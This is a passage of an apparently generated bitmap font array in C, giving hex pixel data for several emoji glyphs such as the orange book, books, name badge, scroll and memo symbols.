0xe0, 0x0, 0x0, 0x0, 0x1, 0x8f, 0xff, 0x80,
0x0, 0x0, 0x0, 0x6, 0x1f, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x18, 0x7f, 0xff, 0xff, 0xff, 0xff,
0xff, 0xe1, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x87, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x1f,
0xfe, 0x0, 0x0, 0x0, 0x0, 0x18, 0x7f, 0xf8,
0x0, 0x0, 0x0, 0x0, 0x61, 0xff, 0xe0, 0x0,
0x0, 0x0, 0x1, 0x87, 0xff, 0x80, 0x0, 0x0,
0x0, 0x6, 0x1f, 0xfe, 0x0, 0x0, 0x0, 0x0,
0x18, 0x7f, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x61,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x87, 0xff,
0xff, 0xff, 0xff, 0xff, 0xfe, 0x1f, 0xff, 0xff,
0xff, 0xff, 0xff, 0xf8, 0x7f, 0xf8, 0x0, 0x0,
0x0, 0x0, 0x61, 0xff, 0xe0, 0x0, 0x0, 0x0,
0x1, 0x87, 0xff, 0x80, 0x0, 0x0, 0x0, 0x6,
0x1f, 0xfe, 0x0, 0x0, 0x0, 0x0, 0x18, 0x7f,
0xf8, 0x0, 0x0, 0x0, 0x0, 0x61, 0xff, 0xe0,
0x0, 0x0, 0x0, 0x1, 0x87, 0xff, 0xff, 0xff,
0xff, 0xff, 0xfe, 0x1f, 0xff, 0xff, 0xff, 0xff,
0xff, 0xf8, 0x7f, 0xff, 0xff, 0xff, 0xff, 0xff,
0xe1, 0xff, 0xe0, 0x0, 0x0, 0x0, 0x1, 0x87,
0xff, 0x80, 0x0, 0x0, 0x0, 0x6, 0x1f, 0xfe,
0x0, 0x0, 0x0, 0x0, 0x18, 0x7f, 0xf8, 0x0,
0x0, 0x0, 0x0, 0x61, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x1, 0x87, 0xff, 0x80, 0x0, 0x0, 0x0,
0x6, 0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe1, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0x87, 0xff, 0x80,
0x0, 0x0, 0x0, 0x6, 0x1f, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x18, 0x7f, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x61, 0xff, 0xe0, 0x0, 0x0, 0x0, 0x1,
0x87, 0xff, 0x80, 0x0, 0x0, 0x0, 0x6, 0x1f,
0xfe, 0x0, 0x0, 0x0, 0x0, 0x18, 0x7f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xe1, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0x87, 0xff, 0xff, 0xff, 0xff,
0xff, 0xfe, 0x1f, 0xfe, 0x0, 0x0, 0x0, 0x0,
0x18, 0x7f, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x61,
0xff, 0xe0, 0x0, 0x0, 0x0, 0x1, 0x87, 0xff,
0x80, 0x0, 0x0, 0x0, 0x6, 0x1f, 0xfe, 0x0,
0x0, 0x0, 0x0, 0x18, 0x7f, 0xf8, 0x0, 0x0,
0x0, 0x0, 0xe1, 0xff, 0xe0, 0x0, 0x0, 0x0,
0x7, 0x87, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xdc, 0x7f,
0x0, 0x0, 0x0, 0x0, 0x0, 0x39, 0xf8, 0x0,
0x0, 0x0, 0x0, 0x0, 0xf7, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xff, 0x80, 0x0, 0x0, 0x0,
0x0, 0x3, 0xf7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x9f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe0,
/* U+1F4D9 "📙" */
0x1f, 0xff, 0xff, 0xff, 0xff, 0xf0, 0x1, 0xff,
0xff, 0xff, 0xff, 0xff, 0xf0, 0x7, 0xff, 0xff,
0xff, 0xff, 0xff, 0xc0, 0x3f, 0xe0, 0x70, 0xe,
0xe3, 0x83, 0xf8, 0xff, 0x81, 0xe0, 0x39, 0xce,
0x7, 0xfb, 0xfe, 0x7, 0xc0, 0xe3, 0xb8, 0x1f,
0xff, 0xf8, 0x1f, 0x83, 0x87, 0xe0, 0x6f, 0xff,
0xe0, 0x77, 0xe, 0xf, 0x81, 0x87, 0xff, 0x81,
0xce, 0x38, 0x1e, 0x6, 0x1f, 0xfe, 0x7, 0x1c,
0xe0, 0x38, 0x18, 0x7f, 0xfc, 0x1c, 0x3b, 0x80,
0xf0, 0x61, 0xff, 0xf8, 0x70, 0x7e, 0x3, 0xe1,
0x87, 0xff, 0xf1, 0xc0, 0xf8, 0xf, 0xc6, 0x1f,
0xfe, 0xe7, 0x3, 0xe0, 0x3f, 0x98, 0x7f, 0xf9,
0xdc, 0x7, 0x80, 0xee, 0x61, 0xff, 0xe3, 0xf0,
0xf, 0x3, 0x9d, 0x87, 0xff, 0x87, 0xc0, 0x3e,
0xe, 0x3e, 0x1f, 0xfe, 0xf, 0x0, 0xfc, 0x38,
0x78, 0x7f, 0xf8, 0x1c, 0x3, 0xf8, 0xe0, 0xe1,
0xff, 0xe0, 0x78, 0xe, 0xf3, 0x81, 0x87, 0xff,
0x81, 0xf0, 0x39, 0xee, 0x6, 0x1f, 0xfe, 0x7,
0xe0, 0xe3, 0xf8, 0x18, 0x7f, 0xf8, 0x1d, 0xc3,
0x87, 0xe0, 0x61, 0xff, 0xe0, 0x73, 0x8e, 0xf,
0x81, 0x87, 0xff, 0xc1, 0xc7, 0x38, 0x1e, 0x6,
0x1f, 0xff, 0x87, 0xe, 0xe0, 0x3c, 0x18, 0x7f,
0xff, 0x1c, 0x1f, 0x80, 0xf8, 0x61, 0xff, 0xfe,
0x70, 0x3e, 0x3, 0xf1, 0x87, 0xff, 0xbd, 0xc0,
0x78, 0xf, 0xe6, 0x1f, 0xfe, 0x7f, 0x0, 0xe0,
0x3b, 0xd8, 0x7f, 0xf8, 0xfc, 0x3, 0xc0, 0xe7,
0xe1, 0xff, 0xe1, 0xf0, 0xf, 0x83, 0x8f, 0x87,
0xff, 0x83, 0xc0, 0x3f, 0xe, 0x1e, 0x1f, 0xfe,
0x7, 0x80, 0xee, 0x38, 0x38, 0x7f, 0xf8, 0x1f,
0x3, 0x9c, 0xe0, 0x61, 0xff, 0xe0, 0x7e, 0xe,
0x7b, 0x81, 0x87, 0xff, 0x81, 0xfc, 0x38, 0xfe,
0x6, 0x1f, 0xfe, 0x7, 0x78, 0xe1, 0xf8, 0x18,
0x7f, 0xf8, 0x1c, 0xf3, 0x83, 0xe0, 0x61, 0xff,
0xf0, 0x71, 0xee, 0x7, 0x81, 0x87, 0xff, 0xe1,
0xc3, 0xf8, 0xf, 0x6, 0x1f, 0xff, 0xc7, 0x7,
0xe0, 0x3e, 0x18, 0x7f, 0xfb, 0x9c, 0xf, 0x80,
0xfc, 0x61, 0xff, 0xe7, 0x70, 0x1e, 0x3, 0xf9,
0x87, 0xff, 0x8f, 0xc0, 0x3c, 0xe, 0xf6, 0x1f,
0xfe, 0x1f, 0x0, 0xf8, 0x39, 0xf8, 0x7f, 0xf8,
0x3c, 0x3, 0xf0, 0xe3, 0xe1, 0xff, 0xe0, 0x78,
0xf, 0xe3, 0x87, 0x87, 0xff, 0x81, 0xf0, 0x39,
0xce, 0xe, 0x1f, 0xfe, 0x7, 0xe0, 0xe3, 0xb8,
0x18, 0x7f, 0xf8, 0x1f, 0xc3, 0x87, 0xe0, 0x61,
0xff, 0xe0, 0x77, 0x8e, 0xf, 0x81, 0x87, 0xff,
0x81, 0xcf, 0x38, 0x1e, 0x6, 0x1f, 0xfe, 0x7,
0x1e, 0xe0, 0x38, 0x18, 0x7f, 0xf8, 0x1c, 0x3f,
0x80, 0xf0, 0xe1, 0xff, 0xe0, 0x70, 0x7e, 0x3,
0xe7, 0xc7, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xdc, 0x7f,
0x0, 0x0, 0x0, 0x0, 0x0, 0x39, 0xf8, 0x0,
0x0, 0x0, 0x0, 0x0, 0xf7, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xff, 0x80, 0x0, 0x0, 0x0,
0x0, 0x3, 0xf7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x9f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe0,
/* U+1F4DA "📚" */
0x0, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xff, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xff, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xf3, 0xff, 0x80, 0x0, 0x0,
0x0, 0x0, 0x1, 0xf0, 0x3f, 0xf8, 0x0, 0x0,
0x0, 0x0, 0x1, 0xf0, 0x3, 0xff, 0x0, 0x0,
0x0, 0x0, 0x3, 0xe0, 0x0, 0x7f, 0xf0, 0x0,
0x0, 0x0, 0x3, 0xe0, 0x0, 0x7, 0xff, 0x0,
0x0, 0x0, 0x3, 0xe0, 0x0, 0x0, 0x7f, 0xf0,
0x0, 0x0, 0x3, 0xe0, 0x0, 0x0, 0x7, 0xff,
0x0, 0x0, 0x3, 0xe0, 0x0, 0x0, 0x0, 0x7f,
0xf0, 0x0, 0x3, 0xe0, 0x0, 0x0, 0x0, 0x7,
0xff, 0x0, 0x0, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x7f, 0xf0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0,
0xf, 0xfe, 0x0, 0x3, 0xe0, 0x0, 0x0, 0x0,
0x0, 0xff, 0xe0, 0x0, 0x7e, 0x0, 0x0, 0x0,
0x0, 0xf, 0xfe, 0x0, 0x1b, 0xe0, 0x0, 0x0,
0x0, 0x0, 0xff, 0xe0, 0x6, 0x3e, 0x0, 0x0,
0x0, 0x0, 0xf, 0xfe, 0x1, 0x83, 0xc0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xc0, 0xe0, 0x3c, 0x0,
0x0, 0x0, 0x0, 0xf, 0xf8, 0xf8, 0x3, 0xc0,
0x0, 0x0, 0x0, 0x1, 0xff, 0x3c, 0x0, 0x7c,
0x0, 0x0, 0x0, 0x1, 0xf0, 0xe7, 0x80, 0x7,
0xc0, 0x0, 0x0, 0x1, 0xf0, 0x18, 0x78, 0x0,
0x7c, 0x0, 0x0, 0x1, 0xf0, 0x6, 0xf, 0x80,
0x7, 0x80, 0x0, 0x1, 0xf0, 0x1, 0x80, 0xf8,
0x0, 0x78, 0x0, 0x1, 0xf0, 0x0, 0xe0, 0x1f,
0x80, 0x7, 0x80, 0x3, 0xf0, 0x0, 0x70, 0x7,
0xf0, 0x0, 0x78, 0x3, 0xf0, 0x0, 0x38, 0x1,
0xff, 0x0, 0x7, 0x83, 0xf0, 0x0, 0x3c, 0x0,
0x3f, 0xf0, 0x0, 0xfb, 0xf0, 0x0, 0x3c, 0x0,
0xf, 0xff, 0x0, 0xf, 0xf0, 0x0, 0x3e, 0x0,
0x7, 0xff, 0xf0, 0x0, 0xe0, 0x0, 0x3d, 0xc0,
0x7, 0xff, 0xfe, 0x0, 0x18, 0x0, 0x3c, 0x38,
0x7, 0xcf, 0xfd, 0xe0, 0x6, 0x0, 0x3c, 0x7,
0x7, 0xc1, 0xff, 0x1e, 0x1, 0x80, 0x3c, 0x0,
0xe1, 0xc0, 0x3f, 0xe3, 0xe0, 0x60, 0x7c, 0x7,
0xf8, 0x7c, 0xf, 0xf8, 0x3e, 0x18, 0x7c, 0x3f,
0xf8, 0x7, 0xc1, 0xff, 0x3, 0xe6, 0x7c, 0xff,
0xdc, 0x1, 0xfc, 0x3f, 0xe0, 0x3f, 0xff, 0xfe,
0x7, 0x80, 0x37, 0x8f, 0xf8, 0x3, 0xff, 0xf0,
0x1, 0xe0, 0xc, 0x79, 0xff, 0x1, 0xff, 0x80,
0x0, 0x7c, 0x3, 0xf, 0xbf, 0xef, 0xfe, 0x0,
0x0, 0xf, 0x81, 0xc0, 0xff, 0xff, 0xf0, 0x0,
0x0, 0x7, 0xf1, 0xf0, 0xf, 0xff, 0x80, 0x0,
0x0, 0x3f, 0xfe, 0x78, 0x0, 0xfe, 0x0, 0x0,
0x0, 0xff, 0xe1, 0x9f, 0x0, 0xf, 0x0, 0x0,
0x7, 0xff, 0xe0, 0x31, 0xf0, 0x1, 0xc0, 0x0,
0x1f, 0xf9, 0xe0, 0xc, 0x1f, 0x0, 0x30, 0x0,
0xff, 0xc3, 0xe0, 0x3, 0x1, 0xe0, 0xe, 0x3,
0xfe, 0x3, 0xe0, 0x1, 0x80, 0x1e, 0x1, 0xff,
0xf8, 0x3, 0xe0, 0x0, 0xe0, 0x3, 0xe0, 0x1f,
0xf0, 0x3, 0xe0, 0x0, 0x70, 0x0, 0x3e, 0x0,
0x1f, 0x3, 0xe0, 0x0, 0x78, 0x0, 0x3, 0xe0,
0x1, 0xf3, 0xe0, 0x0, 0x7c, 0x0, 0x0, 0x3e,
0x0, 0x1f, 0xe0, 0x0, 0x7c, 0x0, 0x0, 0x3,
0xc0, 0x1, 0xe0, 0x0, 0x7c, 0x0, 0x0, 0x0,
0x3c, 0x0, 0x30, 0x0, 0x78, 0x0, 0x0, 0x0,
0x7, 0xc0, 0xc, 0x0, 0x78, 0x0, 0x0, 0x0,
0x0, 0x7c, 0x3, 0x0, 0x78, 0x0, 0x0, 0x0,
0x0, 0x7, 0xc0, 0xc0, 0x78, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7c, 0x30, 0x78, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0x9c, 0x78, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xfe, 0x78, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x8, 0x0, 0x0, 0x0,
0x0,
/* U+1F4DB "📛" */
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x6, 0x0, 0x1, 0x80, 0x0, 0x60, 0x0,
0x0, 0xe, 0x0, 0x1, 0x80, 0x0, 0x70, 0x0,
0x0, 0x1f, 0x0, 0x3, 0xc0, 0x0, 0xf8, 0x0,
0x0, 0x3f, 0x80, 0x3, 0xc0, 0x1, 0xfc, 0x0,
0x0, 0x3f, 0x80, 0x7, 0xe0, 0x1, 0xfc, 0x0,
0x0, 0x7f, 0xc0, 0xf, 0xf0, 0x3, 0xfe, 0x0,
0x0, 0xff, 0xc0, 0xf, 0xf0, 0x3, 0xff, 0x0,
0x0, 0xff, 0xe0, 0x1f, 0xf8, 0x7, 0xff, 0x0,
0x1, 0xff, 0xf0, 0x1f, 0xf8, 0xf, 0xff, 0x80,
0x3, 0xff, 0xf0, 0x3f, 0xfc, 0xf, 0xff, 0xc0,
0x3, 0xff, 0xf8, 0x7f, 0xfe, 0x1f, 0xff, 0xc0,
0x7, 0xff, 0xfc, 0x7f, 0xfe, 0x1f, 0xff, 0xe0,
0x7, 0xff, 0xfc, 0xff, 0xff, 0x3f, 0xff, 0xe0,
0x7, 0xff, 0xfe, 0xff, 0xff, 0x7f, 0xff, 0xe0,
0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf0,
0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf0,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe,
0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe,
0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe,
0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe,
0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe,
0xff, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xff,
0xff, 0x80, 0x0, 0x0, 0x0, 0x0, 0x1, 0xff,
0xff, 0x80, 0x0, 0x0, 0x0, 0x0, 0x1, 0xff,
0xff, 0x80, 0x0, 0x0, 0x0, 0x0, 0x1, 0xff,
0xff, 0x80, 0x0, 0x0, 0x0, 0x0, 0x1, 0xff,
0xff, 0x80, 0x0, 0x0, 0x0, 0x0, 0x1, 0xff,
0xff, 0x80, 0x0, 0x0, 0x0, 0x0, 0x1, 0xff,
0xff, 0x80, 0x0, 0x0, 0x0, 0x0, 0x1, 0xff,
0xff, 0x80, 0x0, 0x0, 0x0, 0x0, 0x1, 0xff,
0xff, 0x80, 0x0, 0x0, 0x0, 0x0, 0x1, 0xff,
0xff, 0x80, 0x0, 0x0, 0x0, 0x0, 0x1, 0xff,
0xff, 0x80, 0x0, 0x0, 0x0, 0x0, 0x1, 0xff,
0xff, 0x80, 0x0, 0x0, 0x0, 0x0, 0x1, 0xff,
0x7f, 0x80, 0x0, 0x0, 0x0, 0x0, 0x1, 0xfe,
0x7f, 0x80, 0x0, 0x0, 0x0, 0x0, 0x1, 0xfe,
0x7f, 0x80, 0x0, 0x0, 0x0, 0x0, 0x1, 0xfe,
0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe,
0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf0,
0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf0,
0x7, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe0,
0x3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xc0,
0x3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xc0,
0x1, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x80,
0x0, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x0,
0x0, 0x7f, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x0,
0x0, 0x1f, 0xff, 0xff, 0xff, 0xff, 0xf8, 0x0,
0x0, 0xf, 0xff, 0xff, 0xff, 0xff, 0xf0, 0x0,
0x0, 0x3, 0xff, 0xff, 0xff, 0xff, 0xc0, 0x0,
0x0, 0x1, 0xff, 0xff, 0xff, 0xff, 0x0, 0x0,
0x0, 0x0, 0x3f, 0xff, 0xff, 0xfc, 0x0, 0x0,
0x0, 0x0, 0x7, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xfe, 0x0, 0x0, 0x0,
/* U+1F4DC "📜" */
0x0, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x0,
0x0, 0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
0x0, 0x7, 0xf7, 0x0, 0x0, 0x0, 0x0, 0x3,
0xc0, 0x0, 0xe7, 0x38, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x3c, 0x39, 0x80, 0x0, 0x0, 0x0,
0x0, 0xe0, 0x7, 0xe1, 0x8c, 0x0, 0x0, 0x0,
0x0, 0xe, 0x0, 0xff, 0x1c, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x70, 0xe, 0x71, 0xcc, 0x1f, 0xe0,
0xff, 0xfe, 0x7, 0x0, 0xe7, 0x1c, 0xc0, 0xfe,
0xf, 0xff, 0xe0, 0x70, 0xe, 0x71, 0xcc, 0x0,
0x0, 0x0, 0x0, 0x7, 0x0, 0x7e, 0x38, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x70, 0x3, 0xe3, 0x8c,
0x0, 0x0, 0x0, 0x0, 0x7, 0x0, 0xf, 0xf9,
0xc0, 0x30, 0xe0, 0x31, 0xc0, 0x70, 0x0, 0x7f,
0x3c, 0xf, 0xfe, 0x7, 0xfe, 0x7, 0x0, 0x3,
0xe7, 0xc0, 0xff, 0xe0, 0x7f, 0xe0, 0x70, 0x0,
0x1f, 0xfc, 0x0, 0x0, 0x0, 0x0, 0x7, 0x0,
0x0, 0x7f, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0xc, 0x0, 0x0, 0x0, 0x0, 0x7,
0x0, 0x0, 0x0, 0xc0, 0x18, 0x3, 0x8, 0x0,
0x70, 0x0, 0x0, 0xc, 0xf, 0xff, 0xff, 0xf8,
0x7, 0x0, 0x0, 0x0, 0xc0, 0xf7, 0xff, 0xff,
0x0, 0x70, 0x0, 0x0, 0xc, 0x0, 0x0, 0x0,
0x0, 0x7, 0x0, 0x0, 0x0, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x70, 0x0, 0x0, 0xc, 0x0, 0x0,
0x0, 0x10, 0x7, 0x0, 0x0, 0x0, 0xc0, 0xff,
0xff, 0x7, 0xe0, 0x70, 0x0, 0x0, 0xc, 0xf,
0xff, 0xe0, 0x7e, 0x7, 0x0, 0x0, 0x0, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x70, 0x0, 0x0, 0xc,
0x0, 0x0, 0x0, 0x0, 0x7, 0x0, 0x0, 0x0,
0xc0, 0x0, 0x0, 0x0, 0x0, 0x70, 0x0, 0x0,
0xc, 0x0, 0x0, 0x10, 0x0, 0x7, 0x0, 0x0,
0x0, 0xc0, 0xff, 0xff, 0xff, 0x0, 0x70, 0x0,
0x0, 0xc, 0xf, 0xff, 0xff, 0xf0, 0x7, 0x0,
0x0, 0x0, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0xc, 0x0, 0x0, 0x0, 0x0, 0x7,
0x0, 0x0, 0x0, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x0, 0xc, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x0, 0x0, 0xc0, 0xff, 0xff, 0xff,
0xe0, 0x70, 0x0, 0x0, 0xc, 0xf, 0xff, 0xff,
0xfe, 0x7, 0x0, 0x0, 0x0, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x70, 0x0, 0x0, 0xc, 0x0, 0x0,
0x0, 0x0, 0x7, 0x0, 0x0, 0x0, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x70, 0x0, 0x0, 0xc, 0x0,
0x0, 0x0, 0x0, 0x7, 0x0, 0x0, 0x0, 0xc0,
0x1, 0xff, 0xf8, 0x0, 0x70, 0x0, 0x0, 0xc,
0x0, 0x1f, 0xff, 0x80, 0x7, 0x0, 0x0, 0x0,
0xc0, 0x0, 0x0, 0x0, 0x0, 0x70, 0x0, 0x0,
0xc, 0x0, 0x0, 0x0, 0x0, 0x7, 0x0, 0x0,
0x0, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x70, 0x0,
0x0, 0xc, 0x0, 0x0, 0x0, 0x0, 0x7, 0x0,
0x0, 0x0, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x0, 0x0, 0x1f, 0xff, 0xff, 0xff, 0xff, 0xff,
0xf8, 0x0, 0x3, 0xf3, 0x80, 0x0, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x7f, 0x9c, 0x0, 0x0, 0x0,
0x0, 0xe, 0x0, 0x3e, 0x39, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xe0, 0x7, 0xf1, 0xce, 0x0, 0x0,
0x0, 0x0, 0x7, 0x0, 0xe3, 0x9c, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x70, 0xe, 0x39, 0xce, 0x0,
0x0, 0x0, 0x0, 0x7, 0x0, 0xe3, 0x9c, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x70, 0x7, 0xf1, 0xce,
0x0, 0x0, 0x0, 0x0, 0x7, 0x0, 0x3e, 0x3c,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x70, 0x0, 0x73,
0x9c, 0x0, 0x0, 0x0, 0x0, 0xe, 0x0, 0x7,
0xf1, 0xc0, 0x0, 0x0, 0x0, 0x1, 0xe0, 0x0,
0x3e, 0x38, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0,
0x0, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x80,
0x0, 0x3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf0,
/* U+1F4DD "📝" */
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe0, 0x0,
0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x0,
0x0, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe0,
0x0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe,
0x0, 0x0, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xe0, 0x0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0xe, 0x3e, 0x0, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe7, 0xf8, 0xe, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe, 0xf3, 0xc0, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xff, 0xcf, 0xe, 0x0, 0x0, 0x0,
0x0, 0x0, 0xf, 0x9e, 0x38, 0xe0, 0x0, 0x0,
0x38, 0x0, 0x0, 0xf0, 0x71, 0xce, 0x7, 0xff,
0x1f, 0xfc, 0x0, 0xf, 0x3, 0xc6, 0xe0, 0x2f,
0x3f, 0x81, 0x80, 0x1, 0xe0, 0x1f, 0x7e, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0x0, 0x7f, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x38, 0x1, 0xfe,
0x0, 0x0, 0x0, 0x0, 0x0, 0x61, 0xc0, 0x7,
0xe0, 0x0, 0x0, 0x0, 0x0, 0xe, 0xf, 0x0,
0x6e, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x78,
0xe, 0xe0, 0x0, 0x0, 0x0, 0x0, 0xe, 0x1,
0xe1, 0xce, 0x0, 0x0, 0x0, 0x0, 0x1, 0xf0,
0xf, 0x98, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x39,
0xc0, 0x3f, 0x8e, 0x7, 0x87, 0x84, 0x0, 0x3,
0x1e, 0x0, 0x78, 0xe0, 0x2f, 0xcf, 0xc0, 0x0,
0x61, 0xf8, 0x7, 0xe, 0x0, 0x0, 0x0, 0x0,
0xe, 0x3b, 0xe0, 0x60, 0xe0, 0x0, 0x0, 0x0,
0x1, 0xc7, 0xf, 0x8c, 0xe, 0x0, 0x0, 0x0,
0x0, 0x18, 0xe0, 0xff, 0xc0, 0xe0, 0x0, 0x0,
0x0, 0x3, 0x8c, 0x1c, 0x78, 0xe, 0x0, 0x0,
0x0, 0x0, 0x71, 0xc1, 0x8e, 0x0, 0xe0, 0x7c,
0x78, 0x1f, 0x1e, 0x38, 0x30, 0xc0, 0xe, 0x2,
0xfd, 0x80, 0xbf, 0xc7, 0x7, 0x18, 0x0, 0xe0,
0x0, 0x0, 0x0, 0x1c, 0x60, 0xe3, 0x80, 0xe,
0x0, 0x0, 0x0, 0x3, 0x8e, 0xc, 0x70, 0x0,
0xe0, 0x0, 0x0, 0x0, 0x71, 0xc1, 0xc6, 0x0,
0xe, 0x0, 0x0, 0x0, 0x6, 0x18, 0x38, 0xe0,
0x0, 0xe0, 0x0, 0x0, 0x0, 0xe3, 0x83, 0x1c,
0x0, 0xe, 0x0, 0x0, 0x0, 0x1c, 0x70, 0x61,
0x80, 0x0, 0xe0, 0x0, 0xfe, 0x3f, 0x8e, 0xe,
0x30, 0x0, 0xe, 0x7, 0xf8, 0xff, 0xf8, 0xc1,
0xc7, 0x0, 0x0, 0xe0, 0x0, 0x0, 0x7, 0x1c,
0x18, 0x60, 0x0, 0xe, 0x0, 0x0, 0x0, 0x73,
0x83, 0x8e, 0x0, 0x0, 0xe0, 0x0, 0x0, 0x7,
0xf0, 0x71, 0xe0, 0x0, 0xe, 0x0, 0x0, 0x0,
0x7f, 0x6, 0x3e, 0x0, 0x0, 0xe0, 0x0, 0x0,
0xe, 0x70, 0xe3, 0xe0, 0x0, 0xe, 0x0, 0x0,
0x0, 0xc3, 0x1c, 0x6e, 0x0, 0x0, 0xe0, 0x3c,
0x3c, 0xc, 0x3f, 0x8e, 0xe0, 0x0, 0xe, 0x3,
0xfe, 0x0, 0xc1, 0xfc, 0xce, 0x0, 0x0, 0xe0,
0x0, 0x0, 0x1c, 0x1, 0xf8, 0xe0, 0x0, 0xe,
